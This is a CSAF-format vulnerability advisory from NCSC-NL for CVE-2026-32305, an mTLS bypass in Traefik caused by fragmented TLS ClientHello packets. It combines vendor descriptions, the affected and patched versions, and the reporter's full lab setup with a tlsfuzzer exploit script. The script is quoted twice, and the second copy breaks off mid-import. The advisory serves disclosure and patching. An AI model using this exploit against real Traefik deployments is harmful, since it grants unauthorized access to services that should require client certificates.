{
"document": {
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE"
}
},
"lang": "en",
"notes": [
{
"category": "legal_disclaimer",
"text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
}
],
"publisher": {
"category": "coordinator",
"contact_details": "cert@ncsc.nl",
"name": "National Cyber Security Centre",
"namespace": "https://www.ncsc.nl/"
},
"title": "CVE-2026-32305",
"tracking": {
"current_release_date": "2026-03-25T18:14:52.484449Z",
"generator": {
"date": "2026-02-17T15:00:00Z",
"engine": {
"name": "V.E.L.M.A",
"version": "1.7"
}
},
"id": "CVE-2026-32305",
"initial_release_date": "2026-03-20T18:29:16.587341Z",
"revision_history": [
{
"date": "2026-03-20T18:29:16.587341Z",
"number": "1",
"summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (3).| References created (4).| CWES updated (1)."
},
{
"date": "2026-03-20T18:29:21.071399Z",
"number": "2",
"summary": "NCSC Score created."
},
{
"date": "2026-03-20T18:29:33.315187Z",
"number": "3",
"summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)."
},
{
"date": "2026-03-20T18:29:35.006621Z",
"number": "4",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-20T18:33:41.398381Z",
"number": "5",
"summary": "Unknown change."
},
{
"date": "2026-03-20T21:07:24.623104Z",
"number": "6",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-20T22:01:11.118720Z",
"number": "7",
"summary": "Source connected.| CVE status created. (valid)| EPSS created."
},
{
"date": "2026-03-21T01:08:13.229669Z",
"number": "8",
"summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (6).| CWES updated (1)."
},
{
"date": "2026-03-21T01:08:26.887343Z",
"number": "9",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-23T12:29:50.982482Z",
"number": "10",
"summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (4).| Product Identifiers created (2).| Product Remediations created (4).| References created (6).| CWES updated (1).| Vendor_assessment created."
},
{
"date": "2026-03-23T12:29:53.943547Z",
"number": "11",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-24T20:56:47.118087Z",
"number": "12",
"summary": "CVSS created.| Products connected (1).| Product Identifiers created (3).| Products created (2)."
},
{
"date": "2026-03-24T20:56:49.882801Z",
"number": "13",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-25T18:13:10.999250Z",
"number": "14",
"summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (2).| Products created (2).| References created (5).| CWES updated (1)."
},
{
"date": "2026-03-25T18:13:13.612246Z",
"number": "15",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-25T18:13:42.764145Z",
"number": "16",
"summary": "Source created.| CVE status created. (valid)| Description created for source.| References created (5)."
}
],
"status": "interim",
"version": "16"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "vers:rpm/3",
"product": {
"name": "vers:rpm/3",
"product_id": "CSAFPID-1441150",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_devspaces:3:"
}
}
}
],
"category": "product_name",
"name": "Red Hat OpenShift Dev Spaces"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:rpm/1",
"product": {
"name": "vers:rpm/1",
"product_id": "CSAFPID-1439281",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_gitops:1"
}
}
}
],
"category": "product_name",
"name": "Red Hat OpenShift GitOps"
},
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "vers:rpm/unknown",
"product": {
"name": "vers:rpm/unknown",
"product_id": "CSAFPID-1496379"
}
}
],
"category": "product_name",
"name": "argo-rollouts-rhel8"
}
],
"category": "product_family",
"name": "Red Hat OpenShift GitOps"
},
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "vers:rpm/unknown",
"product": {
"name": "vers:rpm/unknown",
"product_id": "CSAFPID-2485335"
}
}
],
"category": "product_name",
"name": "traefik-rhel9"
}
],
"category": "product_family",
"name": "Red Hat OpenShift Dev Spaces"
}
],
"category": "vendor",
"name": "Red Hat"
},
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/3.7.0-ea1",
"product": {
"name": "vers:unknown/3.7.0-ea1",
"product_id": "CSAFPID-5902893",
"product_identification_helper": {
"cpe": "cpe:2.3:a:traefik:traefik:3.7.0:ea1:*:*:*:*:*:*"
}
}
},
{
"category": "product_version_range",
"name": "vers:unknown/<2.11.41",
"product": {
"name": "vers:unknown/<2.11.41",
"product_id": "CSAFPID-5874588",
"product_identification_helper": {
"cpe": "cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_version_range",
"name": "vers:unknown/>=0|<2.11.41",
"product": {
"name": "vers:unknown/>=0|<2.11.41",
"product_id": "CSAFPID-5907231"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/>=0|<3.6.11",
"product": {
"name": "vers:unknown/>=0|<3.6.11",
"product_id": "CSAFPID-5907230"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/>=0|<=1.7.34",
"product": {
"name": "vers:unknown/>=0|<=1.7.34",
"product_id": "CSAFPID-5241306"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/>=3.0.0-beta1|<3.6.11",
"product": {
"name": "vers:unknown/>=3.0.0-beta1|<3.6.11",
"product_id": "CSAFPID-5874589"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/>=3.0.0|<=3.6.11",
"product": {
"name": "vers:unknown/>=3.0.0|<=3.6.11",
"product_id": "CSAFPID-5902892",
"product_identification_helper": {
"cpe": "cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_version_range",
"name": "vers:unknown/>=3.7.0-ea.1|<3.7.0-ea.2",
"product": {
"name": "vers:unknown/>=3.7.0-ea.1|<3.7.0-ea.2",
"product_id": "CSAFPID-5874590"
}
}
],
"category": "product_name",
"name": "Traefik"
}
],
"category": "vendor",
"name": "Traefik"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-32305",
"cwe": {
"id": "CWE-1188",
"name": "Initialization of a Resource with an Insecure Default"
},
"notes": [
{
"category": "description",
"text": "Traefik is an HTTP reverse proxy and load balancer. Versions 2.11.40 and below, 3.0.0-beta1 through 3.6.11, and 3.7.0-ea.1 are vulnerable to mTLS bypass through the TLS SNI pre-sniffing logic related to fragmented ClientHello packets. When a TLS ClientHello is fragmented across multiple records, Traefik's SNI extraction may fail with an EOF and return an empty SNI. The TCP router then falls back to the default TLS configuration, which does not require client certificates by default. This allows an attacker to bypass route-level mTLS enforcement and access services that should require mutual TLS authentication. This issue is patched in versions 2.11.41, 3.6.11 and 3.7.0-ea.2.",
"title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/32xxx/CVE-2026-32305.json"
},
{
"category": "description",
"text": "Traefik is an HTTP reverse proxy and load balancer. Versions 2.11.40 and below, 3.0.0-beta1 through 3.6.11, and 3.7.0-ea.1 are vulnerable to mTLS bypass through the TLS SNI pre-sniffing logic related to fragmented ClientHello packets. When a TLS ClientHello is fragmented across multiple records, Traefik's SNI extraction may fail with an EOF and return an empty SNI. The TCP router then falls back to the default TLS configuration, which does not require client certificates by default. This allows an attacker to bypass route-level mTLS enforcement and access services that should require mutual TLS authentication. This issue is patched in versions 2.11.41, 3.6.11 and 3.7.0-ea.2.",
"title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-32305"
},
{
"category": "description",
"text": "## Summary\n\nThere is a potential vulnerability in Traefik's TLS SNI pre-sniffing logic related to fragmented ClientHello packets.\n\nWhen a TLS ClientHello is fragmented across multiple records, Traefik's SNI extraction may fail with an EOF and return an empty SNI. The TCP router then falls back to the default TLS configuration, which does not require client certificates by default. This allows an attacker to bypass route-level mTLS enforcement and access services that should require mutual TLS authentication.\n\n## Patches\n\n- https://github.com/traefik/traefik/releases/tag/v2.11.41\n- https://github.com/traefik/traefik/releases/tag/v3.6.11\n- https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2\n\n## For more information\n\nIf you have any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues).\n\n\nOriginal Description
\n\n### Summary\nI found a behavior in Traefik's latest version where fragmented ClientHello packets can cause pre-sniff SNI extraction to not find the sni (EOF during sniff), which makes the TCP router fall back to default routing TLS config.\n\nIf the default TLS config does not require client certificates (which is NoClientCert by default), the handshake succeeds without client auth, and the request is later routed to the HTTP Host which should be the protected with client certificate authentication (RequireAndVerifyClientCert tls config).\n\n### Details\nThe vulnerability is caused by a mismatch between where Traefik decides the TLS policy per host and where Go TLS can finally parse the full ClientHello.\n\n1. In router.go, ServeTCP function calls clientHelloInfo.\n2. clientHelloInfo peeks only one TLS record length (recLen) and then peeks exactly 5 + recLen bytes.\nIt runs a temporary TLS parse on those bytes to extract the SNI.\nIf ClientHello is fragmented, pre-sniff may return empty SNI (With fragmentation, first record can be incomplete for full ClientHello parsing).\n4. clientHelloInfo still returns isTLS=true and empty SNI (it thinks there is no sni so it applies the default tls config (Which is by default NoClientCert which is permissive)\n5. Real Go TLS handshake succeeds later without requiring the client cert.\n6. Request is routed to the host that should have been protected.\n\nConditions required for impact:\n- Route-level TLS options enforce mTLS for a host.\n- Default TLS config is weaker (noClientCert, which is the default default).\n- Pre-sniff fails to extract SNI (due to fragmented ClientHello).\n\nA workaround for this is to set the default tls config to RequireAndVerifyClientCert (but then you need to explicitly define for each permissive host the NoClientCert TLS config).\n\nA suggestion to fix is to parse the complete ClientHello before tls config decision (handle multi-record fragmentation).\n\n### PoC\n```python\n# prerequisites (ubuntu/debian, in rhel/fedora you need to run only the install command (dnf) but with \"docker\" instead of docker.io and podman will emulate it)\nsudo apt update\nsudo apt install -y docker.io openssl git python3 python3-venv\nsudo usermod -aG docker \"$USER\"\n# in debian/ubuntu run newgrp docker to apply the new group to the user\n\nmkdir -p /tmp/traefik-frag-poc/{certs,config/dynamic}\ncd /tmp/traefik-frag-poc\n\n# CA\nopenssl genrsa -out certs/ca.key 4096\nopenssl req -x509 -new -nodes -key certs/ca.key -sha256 -days 3650 \\\n -subj \"/CN=PoC-CA\" -out certs/ca.crt\n\n# Server cert (whoami.home.arpa)\ncat > certs/server.cnf <<'EOF_SERVER_CNF'\n[req]\ndistinguished_name = dn\nreq_extensions = v3_req\nprompt = no\n\n[dn]\nCN = whoami.home.arpa\n\n[v3_req]\nsubjectAltName = @alt_names\n\n[alt_names]\nDNS.1 = whoami.home.arpa\nEOF_SERVER_CNF\n\nopenssl genrsa -out certs/traefik.key 2048\nopenssl req -new -key certs/traefik.key -out certs/traefik.csr -config certs/server.cnf\nopenssl x509 -req -in certs/traefik.csr -CA certs/ca.crt -CAkey certs/ca.key -CAcreateserial \\\n -out certs/traefik.crt -days 365 -sha256 -extensions v3_req -extfile certs/server.cnf\n\n# Client cert (valid client)\nopenssl genrsa -out certs/client.key 2048\nopenssl req -new -key certs/client.key -subj \"/CN=client1\" -out certs/client.csr\nopenssl x509 -req -in certs/client.csr -CA certs/ca.crt -CAkey certs/ca.key -CAcreateserial \\\n -out certs/client.crt -days 365 -sha256\n\ncat > config/traefik.yml <<'EOF_TRAEFIK_CFG'\nentryPoints:\n websecure:\n address: \":8443\"\n\nproviders:\n file:\n directory: /etc/traefik/dynamic\n watch: true\n\nlog:\n level: DEBUG\nEOF_TRAEFIK_CFG\n\ncat > config/dynamic/dynamic.yml <<'EOF_DYNAMIC_CFG'\nhttp:\n routers:\n whoami:\n rule: \"Host(`whoami.home.arpa`)\"\n entryPoints:\n - websecure\n service: whoami\n tls:\n options: mtls\n\n services:\n whoami:\n loadBalancer:\n servers:\n - url: \"http://whoami:80\"\n\ntls:\n certificates:\n - certFile: /certs/traefik.crt\n keyFile: /certs/traefik.key\n\n options:\n mtls:\n clientAuth:\n caFiles:\n - /certs/ca.crt\n clientAuthType: RequireAndVerifyClientCert\nEOF_DYNAMIC_CFG\n\ndocker network create traefik-poc\n\n\n# run a whoami microservice for the bypass demonstration\ndocker run -d \\\n --name whoami \\\n --network traefik-poc \\\n --restart unless-stopped \\\n traefik/whoami:v1.11.0\n\ndocker run -d \\\n --name traefik \\\n --network traefik-poc \\\n -p 8443:8443 \\\n --restart unless-stopped \\\n -v \"$PWD/config/traefik.yml:/etc/traefik/traefik.yml:ro,Z\" \\\n -v \"$PWD/config/dynamic:/etc/traefik/dynamic:ro,Z\" \\\n -v \"$PWD/certs:/certs:ro,Z\" \\\n traefik:3.6.10 \\\n --configFile=/etc/traefik/traefik.yml\n\n# watch traefik logs to ensure everything was deployed correctly\ndocker logs traefik\n\n# tlsfuzzer setup + frag client script\n\nmkdir -p /tmp/testtlsfuzz\ncd /tmp/testtlsfuzz\ngit clone https://github.com/tlsfuzzer/tlsfuzzer.git\ncd tlsfuzzer\n\npython3 -m venv .venv\nsource .venv/bin/activate\npip install -r requirements.txt\n\ncat > frag_clienthello.py <<'EOF_FRAG_SCRIPT'\nimport argparse\nimport sys\nimport os\n\nfrom tlsfuzzer.runner import Runner\nfrom tlsfuzzer.messages import (\n Connect,\n SetMaxRecordSize,\n ClientHelloGenerator,\n CertificateGenerator,\n CertificateVerifyGenerator,\n ClientKeyExchangeGenerator,\n ChangeCipherSpecGenerator,\n FinishedGenerator,\n ApplicationDataGenerator,\n AlertGenerator,\n)\nfrom tlsfuzzer.expect import (\n ExpectServerHello,\n ExpectCertificate,\n ExpectServerKeyExchange,\n ExpectCertificateRequest,\n ExpectServerHelloDone,\n ExpectChangeCipherSpec,\n ExpectFinished,\n ExpectApplicationData,\n ExpectAlert,\n ExpectClose,\n)\nfrom tlsfuzzer.helpers import SIG_ALL\nfrom tlslite.constants import (\n CipherSuite,\n ExtensionType,\n AlertLevel,\n AlertDescription,\n GroupName,\n)\nfrom tlslite.extensions import (\n SNIExtension,\n TLSExtension,\n SupportedGroupsExtension,\n SignatureAlgorithmsExtension,\n SignatureAlgorithmsCertExtension,\n)\nfrom tlslite.utils.keyfactory import parsePEMKey\nfrom tlslite.x509 import X509\nfrom tlslite.x509certchain import X509CertChain\n\n\nclass PrettyExpectApplicationData(ExpectApplicationData):\n def process(self, state, msg):\n super().process(state, msg)\n text = msg.write().decode(\"utf-8\", errors=\"replace\")\n head, _, body = text.partition(\"\\r\\n\\r\\n\")\n print(\"\\n=== HTTP RESPONSE ===\")\n print(head)\n print()\n print(body)\n print(\"=== END HTTP RESPONSE ===\\n\")\n\n\ndef load_client_cert_and_key(cert_path, key_path):\n cert = None\n key = None\n\n if cert_path:\n text_cert = open(cert_path, \"rb\").read()\n if sys.version_info[0] >= 3:\n text_cert = str(text_cert, \"utf-8\")\n cert = X509()\n cert.parse(text_cert)\n\n if key_path:\n text_key = open(key_path, \"rb\").read()\n if sys.version_info[0] >= 3:\n text_key = str(text_key, \"utf-8\")\n key = parsePEMKey(text_key, private=True)\n\n return cert, key\n\n\ndef main():\n p = argparse.ArgumentParser()\n p.add_argument(\"--connect-host\", default=\"127.0.0.1\")\n p.add_argument(\"--port\", type=int, default=8443)\n p.add_argument(\"--sni\", default=\"whoami.home.arpa\")\n p.add_argument(\"--record-size\", type=int, default=512)\n p.add_argument(\"--padding-len\", type=int, default=1200)\n p.add_argument(\"--expect-cert-request\", action=\"store_true\")\n p.add_argument(\"--client-cert-pem\", default=\"\")\n p.add_argument(\"--client-key-pem\", default=\"\")\n args = p.parse_args()\n\n cert, key = load_client_cert_and_key(args.client_cert_pem, args.client_key_pem)\n\n print(f\"[DBG] cert_arg={args.client_cert_pem!r} key_arg={args.client_key_pem!r}\")\n for p in [args.client_cert_pem, args.client_key_pem]:\n if p:\n print(f\"[DBG] file={p} exists={os.path.exists(p)} size={os.path.getsize(p) if os.path.exists(p) else -1}\")\n\n print(f\"[DBG] cert_loaded={cert is not None} key_loaded={key is not None}\")\n print(f\"[DBG] bool(cert)={bool(cert) if cert is not None else None} bool(key)={bool(key) if key is not None else None}\")\n\n\n if (args.client_cert_pem or args.client_key_pem) and not (cert and key):\n raise ValueError(\"Provide both --client-cert-pem and --client-key-pem\")\n\n conv = Connect(args.connect_host, args.port)\n node = conv\n node = node.add_child(SetMaxRecordSize(args.record_size))\n\n ext = {\n ExtensionType.server_name: SNIExtension().create(bytearray(args.sni, \"ascii\")),\n ExtensionType.supported_groups: SupportedGroupsExtension().create(\n [GroupName.secp256r1, GroupName.ffdhe2048]\n ),\n ExtensionType.signature_algorithms: SignatureAlgorithmsExtension().create(SIG_ALL),\n ExtensionType.signature_algorithms_cert: SignatureAlgorithmsCertExtension().create(SIG_ALL),\n 21: TLSExtension().create(21, bytearray(args.padding_len)),\n }\n\n ciphers = [\n CipherSuite.TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,\n CipherSuite.TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA,\n CipherSuite.TLS_DHE_RSA_WITH_AES_128_CBC_SHA,\n CipherSuite.TLS_EMPTY_RENEGOTIATION_INFO_SCSV,\n ]\n\n node = node.add_child(ClientHelloGenerator(ciphers, extensions=ext))\n node = node.add_child(ExpectServerHello())\n node = node.add_child(ExpectCertificate())\n node = node.add_child(ExpectServerKeyExchange())\n\n if args.expect_cert_request:\n node = node.add_child(ExpectCertificateRequest())\n\n node = node.add_child(ExpectServerHelloDone())\n\n if args.expect_cert_request and cert and key:\n node = node.add_child(CertificateGenerator(X509CertChain([cert])))\n node = node.add_child(ClientKeyExchangeGenerator())\n node = node.add_child(CertificateVerifyGenerator(key))\n node = node.add_child(ChangeCipherSpecGenerator())\n node = node.add_child(FinishedGenerator())\n node = node.add_child(ExpectChangeCipherSpec())\n node = node.add_child(ExpectFinished())\n req = bytearray(\n f\"GET / HTTP/1.1\\r\\nHost: {args.sni}\\r\\nConnection: close\\r\\n\\r\\n\".encode(\"ascii\")\n )\n node = node.add_child(ApplicationDataGenerator(req))\n node = node.add_child(PrettyExpectApplicationData(output=sys.stdout))\n node = node.add_child(AlertGenerator(AlertLevel.warning, AlertDescription.close_notify))\n node = node.add_child(ExpectAlert())\n node.next_sibling = ExpectClose()\n\n elif args.expect_cert_request and not (cert and key):\n node = node.add_child(CertificateGenerator())\n node = node.add_child(ClientKeyExchangeGenerator())\n node = node.add_child(ChangeCipherSpecGenerator())\n node = node.add_child(FinishedGenerator())\n node = node.add_child(ExpectChangeCipherSpec())\n node = node.add_child(ExpectFinished())\n\n else:\n node = node.add_child(ClientKeyExchangeGenerator())\n node = node.add_child(ChangeCipherSpecGenerator())\n node = node.add_child(FinishedGenerator())\n node = node.add_child(ExpectChangeCipherSpec())\n node = node.add_child(ExpectFinished())\n req = bytearray(\n f\"GET / HTTP/1.1\\r\\nHost: {args.sni}\\r\\nConnection: close\\r\\n\\r\\n\".encode(\"ascii\")\n )\n node = node.add_child(ApplicationDataGenerator(req))\n node = node.add_child(PrettyExpectApplicationData(output=sys.stdout))\n node = node.add_child(AlertGenerator(AlertLevel.warning, AlertDescription.close_notify))\n node = node.add_child(ExpectAlert())\n node.next_sibling = ExpectClose()\n\n try:\n Runner(conv).run()\n print(\"[OK] conversation completed\")\n except AssertionError as e:\n print(f\"[TLS RAW ERROR] {e}\")\n marker = \"Unexpected message from peer: \"\n s = str(e)\n if marker in s:\n print(f\"[TLS PEER MESSAGE] {s.split(marker, 1)[1].strip()}\")\n raise\n\n\nif __name__ == \"__main__\":\n main()\nEOF_FRAG_SCRIPT\n\nchmod +x frag_clienthello.py\ncd /tmp/testtlsfuzz/tlsfuzzer\nsource .venv/bin/activate\n\n# case 1: non fragmented, no client cert (strict mTLS path, should fail. traefik logs should inform that client didn't provide a certificate)\npython frag_clienthello.py \\\n --connect-host 127.0.0.1 \\\n --port 8443 \\\n --sni whoami.home.arpa \\\n --record-size 16384 \\\n --expect-cert-request\n\n# case 1b with openssl instead of my script\nprintf 'GET / HTTP/1.1\\r\\nHost: whoami.home.arpa\\r\\nConnection: close\\r\\n\\r\\n' | \\\nopenssl s_client \\\n -connect 127.0.0.1:8443 \\\n -servername whoami.home.arpa \\\n -tls1_2 \\\n -CAfile /tmp/traefik-frag-poc/certs/ca.crt \\\n -state -msg -tlsextdebug -verify_return_error\n\n\n# case 2: non fragmented, with valid client cert (should succeed) \npython frag_clienthello.py \\\n --connect-host 127.0.0.1 \\\n --port 8443 \\\n --sni whoami.home.arpa \\\n --record-size 16384 \\\n --expect-cert-request \\\n --client-cert-pem /tmp/traefik-frag-poc/certs/client.crt \\\n --client-key-pem /tmp/traefik-frag-poc/certs/client.key\n\n# case 2b with openssl instead of my script\nprintf 'GET / HTTP/1.1\\r\\nHost: whoami.home.arpa\\r\\nConnection: close\\r\\n\\r\\n' | \\\nopenssl s_client -connect 127.0.0.1:8443 -servername whoami.home.arpa -tls1_2 \\\n -cert /tmp/traefik-frag-poc/certs/client.crt \\\n -key /tmp/traefik-frag-poc/certs/client.key \\\n -CAfile /tmp/traefik-frag-poc/certs/ca.crt -quiet\n\n# case 3 fragmented ClientHello, no client cert (bypass behavior test)\npython frag_clienthello.py \\\n --connect-host 127.0.0.1 \\\n --port 8443 \\\n --sni whoami.home.arpa \\\n --record-size 500\n# in the record-size you can play with it as long as the client hello sni sniff function returns an EOF\n```\n\n### Impact\nAn attacker can bypass route-level mTLS enforcement by fragmenting ClientHello so Traefik pre-sniff fails (EOF) and falls back to default permissive TLS config.\n\n \n\n--",
"title": "github - https://api.github.com/advisories/GHSA-wvvq-wgcr-9q48"
},
{
"category": "description",
"text": "A flaw was found in Traefik, an HTTP reverse proxy and load balancer. A remote attacker can exploit this vulnerability by sending fragmented ClientHello packets during the Transport Layer Security (TLS) handshake. This causes Traefik's Server Name Indication (SNI) extraction to fail, leading to a fallback to a default TLS configuration that does not require client certificates. This allows an attacker to bypass mutual TLS (mTLS) authentication, gaining unauthorized access to services that should be protected by client certificate requirements.",
"title": "redhat - https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-32305.json"
},
{
"category": "description",
"text": "## Summary\n\nThere is a potential vulnerability in Traefik's TLS SNI pre-sniffing logic related to fragmented ClientHello packets.\n\nWhen a TLS ClientHello is fragmented across multiple records, Traefik's SNI extraction may fail with an EOF and return an empty SNI. The TCP router then falls back to the default TLS configuration, which does not require client certificates by default. This allows an attacker to bypass route-level mTLS enforcement and access services that should require mutual TLS authentication.\n\n## Patches\n\n- https://github.com/traefik/traefik/releases/tag/v2.11.41\n- https://github.com/traefik/traefik/releases/tag/v3.6.11\n- https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2\n\n## For more information\n\nIf you have any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues).\n\n\nOriginal Description
\n\n### Summary\nI found a behavior in Traefik's latest version where fragmented ClientHello packets can cause pre-sniff SNI extraction to not find the sni (EOF during sniff), which makes the TCP router fall back to default routing TLS config.\n\nIf the default TLS config does not require client certificates (which is NoClientCert by default), the handshake succeeds without client auth, and the request is later routed to the HTTP Host which should be the protected with client certificate authentication (RequireAndVerifyClientCert tls config).\n\n### Details\nThe vulnerability is caused by a mismatch between where Traefik decides the TLS policy per host and where Go TLS can finally parse the full ClientHello.\n\n1. In router.go, ServeTCP function calls clientHelloInfo.\n2. clientHelloInfo peeks only one TLS record length (recLen) and then peeks exactly 5 + recLen bytes.\nIt runs a temporary TLS parse on those bytes to extract the SNI.\nIf ClientHello is fragmented, pre-sniff may return empty SNI (With fragmentation, first record can be incomplete for full ClientHello parsing).\n4. clientHelloInfo still returns isTLS=true and empty SNI (it thinks there is no sni so it applies the default tls config (Which is by default NoClientCert which is permissive)\n5. Real Go TLS handshake succeeds later without requiring the client cert.\n6. Request is routed to the host that should have been protected.\n\nConditions required for impact:\n- Route-level TLS options enforce mTLS for a host.\n- Default TLS config is weaker (noClientCert, which is the default default).\n- Pre-sniff fails to extract SNI (due to fragmented ClientHello).\n\nA workaround for this is to set the default tls config to RequireAndVerifyClientCert (but then you need to explicitly define for each permissive host the NoClientCert TLS config).\n\nA suggestion to fix is to parse the complete ClientHello before tls config decision (handle multi-record fragmentation).\n\n### PoC\n```python\n# prerequisites (ubuntu/debian, in rhel/fedora you need to run only the install command (dnf) but with \"docker\" instead of docker.io and podman will emulate it)\nsudo apt update\nsudo apt install -y docker.io openssl git python3 python3-venv\nsudo usermod -aG docker \"$USER\"\n# in debian/ubuntu run newgrp docker to apply the new group to the user\n\nmkdir -p /tmp/traefik-frag-poc/{certs,config/dynamic}\ncd /tmp/traefik-frag-poc\n\n# CA\nopenssl genrsa -out certs/ca.key 4096\nopenssl req -x509 -new -nodes -key certs/ca.key -sha256 -days 3650 \\\n -subj \"/CN=PoC-CA\" -out certs/ca.crt\n\n# Server cert (whoami.home.arpa)\ncat > certs/server.cnf <<'EOF_SERVER_CNF'\n[req]\ndistinguished_name = dn\nreq_extensions = v3_req\nprompt = no\n\n[dn]\nCN = whoami.home.arpa\n\n[v3_req]\nsubjectAltName = @alt_names\n\n[alt_names]\nDNS.1 = whoami.home.arpa\nEOF_SERVER_CNF\n\nopenssl genrsa -out certs/traefik.key 2048\nopenssl req -new -key certs/traefik.key -out certs/traefik.csr -config certs/server.cnf\nopenssl x509 -req -in certs/traefik.csr -CA certs/ca.crt -CAkey certs/ca.key -CAcreateserial \\\n -out certs/traefik.crt -days 365 -sha256 -extensions v3_req -extfile certs/server.cnf\n\n# Client cert (valid client)\nopenssl genrsa -out certs/client.key 2048\nopenssl req -new -key certs/client.key -subj \"/CN=client1\" -out certs/client.csr\nopenssl x509 -req -in certs/client.csr -CA certs/ca.crt -CAkey certs/ca.key -CAcreateserial \\\n -out certs/client.crt -days 365 -sha256\n\ncat > config/traefik.yml <<'EOF_TRAEFIK_CFG'\nentryPoints:\n websecure:\n address: \":8443\"\n\nproviders:\n file:\n directory: /etc/traefik/dynamic\n watch: true\n\nlog:\n level: DEBUG\nEOF_TRAEFIK_CFG\n\ncat > config/dynamic/dynamic.yml <<'EOF_DYNAMIC_CFG'\nhttp:\n routers:\n whoami:\n rule: \"Host(`whoami.home.arpa`)\"\n entryPoints:\n - websecure\n service: whoami\n tls:\n options: mtls\n\n services:\n whoami:\n loadBalancer:\n servers:\n - url: \"http://whoami:80\"\n\ntls:\n certificates:\n - certFile: /certs/traefik.crt\n keyFile: /certs/traefik.key\n\n options:\n mtls:\n clientAuth:\n caFiles:\n - /certs/ca.crt\n clientAuthType: RequireAndVerifyClientCert\nEOF_DYNAMIC_CFG\n\ndocker network create traefik-poc\n\n\n# run a whoami microservice for the bypass demonstration\ndocker run -d \\\n --name whoami \\\n --network traefik-poc \\\n --restart unless-stopped \\\n traefik/whoami:v1.11.0\n\ndocker run -d \\\n --name traefik \\\n --network traefik-poc \\\n -p 8443:8443 \\\n --restart unless-stopped \\\n -v \"$PWD/config/traefik.yml:/etc/traefik/traefik.yml:ro,Z\" \\\n -v \"$PWD/config/dynamic:/etc/traefik/dynamic:ro,Z\" \\\n -v \"$PWD/certs:/certs:ro,Z\" \\\n traefik:3.6.10 \\\n --configFile=/etc/traefik/traefik.yml\n\n# watch traefik logs to ensure everything was deployed correctly\ndocker logs traefik\n\n# tlsfuzzer setup + frag client script\n\nmkdir -p /tmp/testtlsfuzz\ncd /tmp/testtlsfuzz\ngit clone https://github.com/tlsfuzzer/tlsfuzzer.git\ncd tlsfuzzer\n\npython3 -m venv .venv\nsource .venv/bin/activate\npip install -r requirements.txt\n\ncat > frag_clienthello.py <<'EOF_FRAG_SCRIPT'\nimport argparse\nimport sys\nimport os\n\nfrom tlsfuzzer.runner import Runner\nfrom tlsfuzzer.messages import (\n Connect,\n SetMaxRecordSize,\n ClientHelloGenerator,\n CertificateGenerator,\n CertificateVerifyGenerator,\n ClientKeyExchangeGenerator,\n ChangeCipherSpecGenerator,\n FinishedGenerator,\n ApplicationDataGenerator,\n AlertGenerator,\n)\nfrom tlsfuzzer.expect import (\n ExpectServerHello,\n ExpectCertificate,\n ExpectServerKeyExchange,\n ExpectCertificateRequest,\n ExpectServerHelloDone,\n ExpectChangeCipherSpec,\n ExpectFinished,\n ExpectApplicationData,\n ExpectAlert,\n ExpectClose,\n)\nfrom tlsfuzzer.helpers import SIG_ALL\nfrom tlslite.constants import (\n CipherSuite,\n ExtensionType,\n AlertLevel,\n AlertDescription,\n GroupName,\n)\nfrom tlslite.extensions import (\n SNIExtension,\n TLSExtension,\n SupportedGroupsExtension,\n SignatureAlgorithmsExtension,\n SignatureAlgorithmsCertExtension,\n)\nfrom tlslite.utils.keyfactory import parsePEMKey\nfrom tlslite.x509 import X509\nfrom tlslite.x509certchain import 